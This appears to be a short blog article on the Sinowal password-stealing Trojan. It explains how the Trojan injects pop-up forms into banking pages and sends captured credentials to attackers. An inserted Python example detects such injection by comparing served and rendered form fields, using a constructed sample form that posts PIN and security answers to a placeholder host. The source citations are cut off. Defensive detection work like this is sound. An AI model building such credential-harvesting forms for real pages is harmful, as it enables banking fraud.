Trojan-PSW.Win32.Sinowal.u: Next-Gen Phishing Scam

Dennis Faas's picture

Recently, Kaspersky Labs detected a new form of spam email that carries a password-stealing Trojan horse as an attachment.

The attached malware, which is software designed to infiltrate or damage a computer system without the owner's consent, is called "Trojan-PSW.Win32.Sinowal.u" (herein referred to as "PSW"). (Source:

Senior research engineers at Kaspersky Lab refer to PSW as being "the next-generation Trojan." The variant is part of the "Sinowal" family of password-stealing Trojans, which are designed to steal usernames and passwords entered via forms in an internet browser. (Source:

How Trojan-PSW.Win32.Sinowal.u Steals Passwords

PSW particularly targets banking web sites and also has the ability to steal other locally stored passwords.

When an infected user has started a secure bank transaction, the Trojan can insert its own HTML code into the page being viewed. Typically, a pop-up window will appear and ask the user for personal information, such as a username or password. (Source:
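As an added example (not from the original article or from Kaspersky), here is one way a bank could detect this kind of injected HTML: compare the form fields in the page the server sent with those in a DOM snapshot reported back from the browser. The host names, field names, sample HTML and the assumption that the page reports its DOM back to the server are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Collect input field names and form action hosts from an HTML document."""

    def __init__(self):
        super().__init__()
        self.fields = set()
        self.action_hosts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name"):
            self.fields.add(a["name"].lower())
        elif tag == "form":
            # Relative actions have no hostname and post back to the bank itself.
            host = urlparse(a.get("action") or "").hostname
            if host:
                self.action_hosts.add(host.lower())


def audit(html):
    parser = FormAudit()
    parser.feed(html)
    parser.close()
    return parser


def find_injection(served_html, rendered_html, bank_host):
    """Report fields and form targets present in the browser but not sent by the server."""
    served, rendered = audit(served_html), audit(rendered_html)
    return {
        "extra_fields": sorted(rendered.fields - served.fields),
        "foreign_form_hosts": sorted(h for h in rendered.action_hosts if h != bank_host),
    }


# Constructed sample: the login page as served, and the same page after a
# hypothetical injected prompt asking for additional personal information.
SERVED = """<form action="https://bank.example/login" method="post">
<input name="username"><input name="password" type="password"></form>"""

RENDERED = SERVED + """<div id="overlay"><form action="https://collector.invalid/submit">
<input name="pin"><input name="security_answer"></form></div>"""

if __name__ == "__main__":
    print(find_injection(SERVED, RENDERED, "bank.example"))
```

A non-empty result is a signal to flag the session for review; browser extensions such as password managers can also add fields, so an allowlist is needed in practice.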

The Trojan sends the information it gathers directly to the hacker and can also check for updates to itself. Cleaning the infected system is not enough: the user also has to change all of their passwords. (Source:

In essence, PSW is a new twist on email phishing schemes.
